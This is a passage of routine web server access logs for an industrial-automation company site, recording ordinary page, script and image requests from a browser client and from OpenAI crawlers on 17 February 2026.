+0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:22:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10413] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20877] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:30:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:38:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10386] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:39:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:43:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/robots.txt" [Client 74.7.228.62] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:23:43:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 74.7.243.250] [Length 10386] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" +[17/Feb/2026:23:43:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.243.250] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:43:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 74.7.243.250] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:43:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 74.7.243.250] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:43:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 74.7.243.250] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:43:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 74.7.243.250] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:43:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 74.7.243.250] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:43:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 74.7.243.250] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:43:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 74.7.243.250] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:43:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 74.7.243.250] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:43:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.243.250] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:43:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 74.7.243.250] [Length 20884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:44:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 74.7.243.250] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:44:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.243.250] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10386] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" 